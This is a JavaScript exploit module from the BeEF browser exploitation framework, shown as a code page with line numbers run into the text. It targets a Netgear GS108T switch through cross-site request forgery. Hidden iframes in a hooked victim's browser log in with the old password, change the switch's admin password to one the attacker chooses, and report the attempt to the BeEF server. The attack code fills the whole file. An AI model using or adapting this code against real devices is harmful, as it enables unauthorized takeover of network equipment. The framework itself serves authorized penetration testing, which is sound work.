Path: blob/master/modules/exploits/switch/netgear_gs108t_csrf/command.js
1154 views
//1// Copyright (c) 2006-2025 Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function() {7var base = '<%= @base %>';8var oldpassword = '<%= @oldpassword %>';9var newpassword = '<%= @newpassword %>';1011var gs_iframe = beef.dom.createInvisibleIframe();12gs_login = function() {13var d = new Date;14var rtime = (d.getTime() / 500);15gs_iframe.setAttribute('src', base+'login.cgi?passwd='+oldpassword+'&rtime='+rtime);16}1718var gs108t_iframe = beef.dom.createInvisibleIframe();19gs_change_pwd = function() {20gs108t_iframe.setAttribute('src', base+'password.cgi?inputBox_oldPassword='+oldpassword+'&inputBox_newPassword='+newpassword+'&inputBox_retypeNewPassword='+newpassword);21}2223//login to create the cookie24gs_login();2526//wait some miliseconds and attempt to change the password27setTimeout("gs_change_pwd()", 500);2829beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");3031cleanup = function() {32document.body.removeChild(gs108t_iframe);33document.body.removeChild(gs_iframe);34}35setTimeout("cleanup()", 15000);36});37383940